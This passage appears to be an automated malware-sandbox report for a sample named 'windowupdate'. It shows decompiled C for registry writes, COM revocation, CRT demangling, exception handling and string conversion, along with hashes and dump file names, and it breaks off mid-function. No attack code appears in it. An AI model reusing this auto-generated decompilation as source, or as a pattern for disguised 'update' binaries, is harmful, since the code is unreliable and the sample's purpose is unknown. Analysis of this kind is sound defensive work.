                      0x00d36804
                      0x00d367e2
                      0x00d367c3
                      0x00d36815

                      APIs
                      Strings
                      • %ls, xrefs: 00D367E9
                      • bSuccess, xrefs: 00D367E4
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 00D367F2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DestroyHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 2435110975-1732559737
                      • Opcode ID: 7b9f7d11584b00f8c9e25636889ef352ddea2d4d6e845fd37b03840707389f98
                      • Instruction ID: 7e0998fbc3768c15cfad66e42544022c700f0b3a6bfc7287ec609e145a9197a9
                      • Opcode Fuzzy Hash: 7b9f7d11584b00f8c9e25636889ef352ddea2d4d6e845fd37b03840707389f98
                      • Instruction Fuzzy Hash: A701B170E00319BFCB10EB98D846B5DBBB0AF44704F24C498E80427282D271DE40CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 35%
                      			E00D34740(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
				void** _v8;
				void* _t14;
				void* _t23;
				void* _t24;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t26 =  *_v8;
					if( *_v8 == 0) {
						_t14 = L00D84930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x185e, 0, "%ls", L"m_hKey != 0");
						_t24 = _t24 + 0x18;
						if(_t14 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				return E00DC1520(E00DC1520(RegSetValueExA( *_v8, _a4, 0, 3, _a8, _a12), _t24 - _t24), _t23 - _t24 + 4);
			}







                      0x00d34743
                      0x00d34745
                      0x00d3474c
                      0x00d3474f
                      0x00d34752
                      0x00d34755
                      0x00d3476f
                      0x00d34774
                      0x00d3477a
                      0x00d3477c
                      0x00d3477c
                      0x00d3477a
                      0x00d3477d
                      0x00d347b4

                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00D34799
                      Strings
                      • %ls, xrefs: 00D3475C
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D34768
                      • m_hKey != 0, xrefs: 00D34757
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: a32a1ae83a29d92cba9c2340302c94a8c3eadc1f7252eca4d6663f34fa05f3c4
                      • Instruction ID: 5261b519555614cfe992fd2f9fd1dc9be0f16e1759011cbc73dad9c50e985dcf
                      • Opcode Fuzzy Hash: a32a1ae83a29d92cba9c2340302c94a8c3eadc1f7252eca4d6663f34fa05f3c4
                      • Instruction Fuzzy Hash: B6018171E40219BFD724EB49DC43FAE7369EB55700F148158F504AB281E6B1AE0087F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D347C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 35%
                      			E00D347C0(void** __ecx, void* __esi, char* _a4, char _a8) {
				void** _v8;
				void* _t13;
				void* _t21;
				void* _t22;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t24 =  *_v8;
					if( *_v8 == 0) {
						_t13 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1866, 0, "%ls", L"m_hKey != 0");
						_t22 = _t22 + 0x18;
						if(_t13 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				return E00DC1520(E00DC1520(RegSetValueExA( *_v8, _a4, 0, 4,  &_a8, 4), _t22 - _t22), _t21 - _t22 + 4);
			}







                      0x00d347c3
                      0x00d347c5
                      0x00d347cc
                      0x00d347cf
                      0x00d347d2
                      0x00d347d5
                      0x00d347ef
                      0x00d347f4
                      0x00d347fa
                      0x00d347fc
                      0x00d347fc
                      0x00d347fa
                      0x00d347fd
                      0x00d34832

                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00D34817
                      Strings
                      • %ls, xrefs: 00D347DC
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D347E8
                      • m_hKey != 0, xrefs: 00D347D7
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: 151aa143387219f7b7da06444d55a8e3b3b12c1cafe6d251614ed577711b0b1f
                      • Instruction ID: 2ad3371a759b5a216fb8467be7121696ab34b16521ab0997bd303002eceb1972
                      • Opcode Fuzzy Hash: 151aa143387219f7b7da06444d55a8e3b3b12c1cafe6d251614ed577711b0b1f
                      • Instruction Fuzzy Hash: 90F0A471E40219BFD620FB49DC43F9E7368DB01750F104154F605AB281E6B1AE4087F5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D33430 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                      Download Yara Rule
                      C-Code - Quality: 28%
                      			E00D33430(void* __esi, intOrPtr _a4) {
				intOrPtr _t9;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t22;

				do {
					_t9 = _a4;
					_t23 =  *((intOrPtr*)(_t9 + 0x10));
					if( *((intOrPtr*)(_t9 + 0x10)) == 0) {
						_t14 = L00D84930(_t23, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xf0, 0, "%ls", L"pCache != 0");
						_t22 = _t22 + 0x18;
						if(_t14 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)) != 0) {
					__imp__CoRevokeClassObject( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)));
					__eflags = _t22 - _t22;
					_t12 = E00DC1520( *((intOrPtr*)(_a4 + 0x10)), __eflags);
				} else {
					_t12 = 0;
				}
				return E00DC1520(_t12, _t21 - _t22);
			}








                      0x00d33434
                      0x00d33434
                      0x00d33437
                      0x00d3343b
                      0x00d33455
                      0x00d3345a
                      0x00d33460
                      0x00d33462
                      0x00d33462
                      0x00d33460
                      0x00d33463
                      0x00d33471
                      0x00d33483
                      0x00d33489
                      0x00d3348b
                      0x00d33473
                      0x00d33473
                      0x00d33473
                      0x00d33499

                      APIs
                      • CoRevokeClassObject.OLE32(?), ref: 00D33483
                      Strings
                      • pCache != 0, xrefs: 00D3343D
                      • %ls, xrefs: 00D33442
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3344E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ClassObjectRevoke
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1224902704-3984120347
                      • Opcode ID: 4b029bc34c89dbf470b64212da472672e45d93704c5c459384e8d566cdccc923
                      • Instruction ID: 15830a69e9a670f61e3ab747a8121e1f0d2dbf4d8f1dbc96960d3f3ab963eff7
                      • Opcode Fuzzy Hash: 4b029bc34c89dbf470b64212da472672e45d93704c5c459384e8d566cdccc923
                      • Instruction Fuzzy Hash: A5F02435640315AFC724FF18D942F29B7A5EB54750F448454F8054B683E7B4EE80CAF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D59C10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D59C10(intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t13;
				intOrPtr _t26;
				intOrPtr _t27;

				_t13 =  *0xf20640; // 0x0
				_v8 =  *_t13;
				if(_v8 == 0) {
					E00D4F350(_a4, 1);
					return _a4;
				}
				if(_v8 == 0x41) {
					_t26 =  *0xf20640; // 0x0
					_t27 = _t26 + 1;
					 *0xf20640 = _t27;
					_v16 = E00D50060("{flat}", 6);
					_v12 = _t27;
					E00D4F1F0(_a4,  &_v16);
					return _a4;
				}
				E00D4F350(_a4, 2);
				return _a4;
			}









                      0x00d59c16
                      0x00d59c1d
                      0x00d59c24
                      0x00d59c68
                      0x00000000
                      0x00d59c6d
                      0x00d59c2a
                      0x00d59c2e
                      0x00d59c34
                      0x00d59c37
                      0x00d59c4c
                      0x00d59c4f
                      0x00d59c59
                      0x00000000
                      0x00d59c5e
                      0x00d59c77
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D59C68
                      • DName::DName.LIBVCRUNTIMED ref: 00D59C77
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A${flat}
                      • API String ID: 3739413223-2440177573
                      • Opcode ID: a87fe204ca0450bb86dea8e88632d334dfdf2119954965c85ef11d66a4a176ba
                      • Instruction ID: db6226f7f18c69889c54b5b7baad8fb80ca48b6682373ea11de62686e428a5d8
                      • Opcode Fuzzy Hash: a87fe204ca0450bb86dea8e88632d334dfdf2119954965c85ef11d66a4a176ba
                      • Instruction Fuzzy Hash: 70016270904248EBDF14DF58C856BAD7FF4EB81301F1480A4FC4A5B292CA71AA5597A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4C8D0 Relevance: 6.2, APIs: 4, Instructions: 211COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 64%
                      			E00D4C8D0(intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t90;
				intOrPtr _t94;
				void* _t133;
				intOrPtr _t158;
				intOrPtr _t180;
				void* _t187;
				void* _t189;
				signed int _t191;
				void* _t192;

				_push(0xfffffffe);
				_push(0xdf3b80);
				_push(E00D49CD0);
				_push( *[fs:0x0]);
				_push(_t133);
				_push(_t189);
				_push(_t187);
				_t90 =  *0xdf600c; // 0x71e60372
				_v12 = _v12 ^ _t90;
				_push(_t90 ^ _t191);
				 *[fs:0x0] =  &_v20;
				_v28 = _t192 + 0xffffffe0;
				_v36 = 0;
				if(_a12[1] == 0 ||  *((char*)(_a12[1] + 8)) == 0 || _a12[2] == 0 && ( *_a12 & 0x80000000) == 0) {
					_t94 = 0;
				} else {
					if(( *_a12 & 0x80000000) == 0) {
						_v32 = _a8 + _a12[2] + 0xc;
					} else {
						_v32 = _a8;
					}
					_v8 = 0;
					if(( *_a12 & 0x00000080) == 0 || ( *_a16 & 0x00000010) == 0 ||  *0xf205e8 == 0) {
						_t144 =  *_a12 & 0x00000008;
						if(( *_a12 & 0x00000008) == 0) {
							if(( *_a16 & 0x00000001) == 0) {
								if(_a16[6] != 0) {
									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
										L41:
										L00D90DE0(_t133, _t144, _t187, _t189);
									} else {
										_t144 = _a16;
										if(_a16[6] == 0) {
											goto L41;
										} else {
										}
									}
									if(( *_a16 & 0x00000004) == 0) {
										_v36 = 1;
									} else {
										_v36 = 2;
									}
								} else {
									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
										L00D90DE0(_t133, _t144, _t187, _t189);
									}
									_v48 = _a16[5];
									_v52 = E00D4B310(_a4,  *((intOrPtr*)(_a4 + 0x18)),  &(_a16[2]));
									E00D4B590(_v32, _v52, _v48);
								}
							} else {
								_t148 = _a4;
								if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
									L00D90DE0(_t133, _t148, _t187, _t189);
								}
								E00D4B590(_v32,  *((intOrPtr*)(_a4 + 0x18)), _a16[5]);
								if(_a16[5] == 4 &&  *_v32 != 0) {
									 *_v32 = E00D4B310(_v32,  *_v32,  &(_a16[2]));
								}
							}
						} else {
							if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
								L00D90DE0(_t133, _t144, _t187, _t189);
							}
							 *_v32 =  *((intOrPtr*)(_a4 + 0x18));
							 *_v32 = E00D4B310(_v32,  *_v32,  &(_a16[2]));
						}
					} else {
						_t180 =  *0xf205e8; // 0x0
						_v40 = _t180;
						_t158 = _v40;
						 *0xdc62b0();
						_v44 = _v40();
						if(_v44 == 0 || _v32 == 0) {
							L00D90DE0(_t133, _t158, _t187, _t189);
						}
						 *_v32 = _v44;
						 *_v32 = E00D4B310( *_v32,  *_v32,  &(_a16[2]));
					}
					_v8 = 0xfffffffe;
					_t94 = _v36;
				}
				 *[fs:0x0] = _v20;
				return _t94;
			}

























                      0x00d4c8d3
                      0x00d4c8d5
                      0x00d4c8da
                      0x00d4c8e5
                      0x00d4c8e9
                      0x00d4c8ea
                      0x00d4c8eb
                      0x00d4c8ec
                      0x00d4c8f1
                      0x00d4c8f6
                      0x00d4c8fa
                      0x00d4c900
                      0x00d4c903
                      0x00d4c911
                      0x00d4c940
                      0x00d4c947
                      0x00d4c952
                      0x00d4c969
                      0x00d4c954
                      0x00d4c957
                      0x00d4c957
                      0x00d4c96c
                      0x00d4c97e
                      0x00d4c9ea
                      0x00d4c9ed
                      0x00d4ca37
                      0x00d4caa0
                      0x00d4caf7
                      0x00d4cb0a
                      0x00d4cb0a
                      0x00d4caff
                      0x00d4caff
                      0x00d4cb06
                      0x00000000
                      0x00000000
                      0x00d4cb08
                      0x00d4cb06
                      0x00d4cb17
                      0x00d4cb22
                      0x00d4cb19
                      0x00d4cb19
                      0x00d4cb19
                      0x00d4caa2
                      0x00d4caa9
                      0x00d4cab3
                      0x00d4cab3
                      0x00d4cabe
                      0x00d4cad7
                      0x00d4cae6
                      0x00d4caeb
                      0x00d4ca39
                      0x00d4ca39
                      0x00d4ca40
                      0x00d4ca4a
                      0x00d4ca4a
                      0x00d4ca61
                      0x00d4ca70
                      0x00d4ca92
                      0x00d4ca92
                      0x00d4ca94
                      0x00d4c9ef
                      0x00d4c9f6
                      0x00d4ca00
                      0x00d4ca00
                      0x00d4ca0e
                      0x00d4ca28
                      0x00d4ca28
                      0x00d4c993
                      0x00d4c993
                      0x00d4c999
                      0x00d4c99c
                      0x00d4c99f
                      0x00d4c9a8
                      0x00d4c9af
                      0x00d4c9b9
                      0x00d4c9b9
                      0x00d4c9c4
                      0x00d4c9de
                      0x00d4c9de
                      0x00d4cb29
                      0x00d4cb47
                      0x00d4cb47
                      0x00d4cb4d
                      0x00d4cb5b

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: ce6875dca422289a43f7ca74727fa62ee4c31492c164c3b8df31d2b3e71ac704
                      • Instruction ID: 49beb2e13e377a32a3235878f643568e7a8ea166448f32137f0600a46c342945
                      • Opcode Fuzzy Hash: ce6875dca422289a43f7ca74727fa62ee4c31492c164c3b8df31d2b3e71ac704
                      • Instruction Fuzzy Hash: 58913774A11209DFCB44CF98D885BAAB7B1FB88305F289559E815AB391C734EC81CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D400E0 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D400E0(void* __ebx, char** __ecx, void* __edi, void* __esi, short* _a4, int _a8) {
				char** _v8;
				signed int _v12;
				int _v16;
				char** _v20;
				char** _v24;
				int _v28;
				int _t54;
				char** _t55;
				long _t60;
				int _t62;
				int _t68;
				void* _t97;
				void* _t98;

				_t93 = __edi;
				_t69 = __ebx;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if(_a4 != 0) {
					_v12 = E00D85A70(_a4) + 1;
					_v16 = _v12 << 2;
					E00D42DE0(__ebx, __edi, __esi, _v8, _v16,  &(_v8[1]), 0x80);
					_t98 = _t98 + 0x14;
					_t95 = _t98;
					_t54 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
					__eflags = _t98 - _t98;
					_t55 = E00DC1520(_t54, _t98 - _t98);
					__eflags = _t55;
					if(_t55 != 0) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					_t56 = _v24;
					_v20 = _v24;
					__eflags = _v20;
					if(_v20 != 0) {
						_t95 = _t98;
						_t60 = GetLastError();
						__eflags = _t98 - _t98;
						_t56 = E00DC1520(_t60, _t98 - _t98);
						__eflags = _t56 - 0x7a;
						if(_t56 == 0x7a) {
							_t62 = WideCharToMultiByte(_a8, 0, _a4, _v12, 0, 0, 0, 0);
							__eflags = _t98 - _t98;
							_v16 = E00DC1520(_t62, _t98 - _t98);
							E00D42DE0(_t69, _t93, _t98, _v8, _v16,  &(_v8[1]), 0x80);
							_t98 = _t98 + 0x10;
							_t95 = _t98;
							_t68 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
							__eflags = _t98 - _t98;
							_t56 = E00DC1520(_t68, _t98 - _t98);
							__eflags = _t56;
							if(_t56 != 0) {
								_v28 = 0;
							} else {
								_v28 = 1;
							}
							_v20 = _v28;
						}
					}
					__eflags = _v20;
					if(__eflags != 0) {
						__eflags =  &(_v8[1]);
						E00D42B10(_t93,  *_v8,  &(_v8[1]), 0x80);
						_t98 = _t98 + 0xc;
						_t56 = E00D32580(_t69,  *_v8, _t93, _t95);
					}
				} else {
					_t56 = _v8;
					 *_v8 = 0;
				}
				return E00DC1520(_t56, _t97 - _t98 + 0x18);
			}
















                      0x00d400e0
                      0x00d400e0
                      0x00d400ec
                      0x00d400ef
                      0x00d400f2
                      0x00d400f5
                      0x00d400f8
                      0x00d400fb
                      0x00d400fe
                      0x00d40105
                      0x00d40124
                      0x00d4012d
                      0x00d40144
                      0x00d40149
                      0x00d4014c
                      0x00d4016a
                      0x00d40170
                      0x00d40172
                      0x00d40177
                      0x00d40179
                      0x00d40184
                      0x00d4017b
                      0x00d4017b
                      0x00d4017b
                      0x00d4018b
                      0x00d4018e
                      0x00d40191
                      0x00d40195
                      0x00d4019b
                      0x00d4019d
                      0x00d401a3
                      0x00d401a5
                      0x00d401aa
                      0x00d401ad
                      0x00d401cb
                      0x00d401d1
                      0x00d401d8
                      0x00d401ef
                      0x00d401f4
                      0x00d401f7
                      0x00d40215
                      0x00d4021b
                      0x00d4021d
                      0x00d40222
                      0x00d40224
                      0x00d4022f
                      0x00d40226
                      0x00d40226
                      0x00d40226
                      0x00d40239
                      0x00d40239
                      0x00d401ad
                      0x00d4023c
                      0x00d40240
                      0x00d4024a
                      0x00d40254
                      0x00d40259
                      0x00d4025c
                      0x00d4025c
                      0x00d40107
                      0x00d40107
                      0x00d4010a
                      0x00d4010a
                      0x00d4026f

                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00D37521,?,71E60372), ref: 00D4016A
                      • GetLastError.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00D37521), ref: 00D4019D
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D401CB
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00D40215
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1717984340-0
                      • Opcode ID: e7fb5f2a27bf28ca83dffa86de113f59c8ab95355328fe539ed6781eb7c6bdc6
                      • Instruction ID: 9f839e1b965dc33d5f52ec1a4cc5e1ed4557df0a1d4a6ee369127486e17c70c5
                      • Opcode Fuzzy Hash: e7fb5f2a27bf28ca83dffa86de113f59c8ab95355328fe539ed6781eb7c6bdc6
                      • Instruction Fuzzy Hash: FF511DB5E00209AFDB14DF98D886FAEBBB4EB48304F108158F605AB381D7759E40CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9CFF0 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D9CFF0(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t39;
				void* _t40;
				char* _t81;

				if(_a4 != 0) {
					_t81 = _a4;
					__eflags =  *_t81;
					if( *_t81 != 0) {
						_t64 = _a12;
						_v8 = E00D9E680(_a12, _a16, _a4, 0, 0);
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags = _v8 - E00D9E9E0(_a8);
							if(__eflags <= 0) {
								L12:
								_t39 = E00D9E9E0(_a8);
								_t40 = E00D9EA90(_a8);
								_t68 = _a12;
								_v20 = E00D9E680(_a12, _a16, _a4, _t40, _t39);
								__eflags = _v20;
								if(_v20 != 0) {
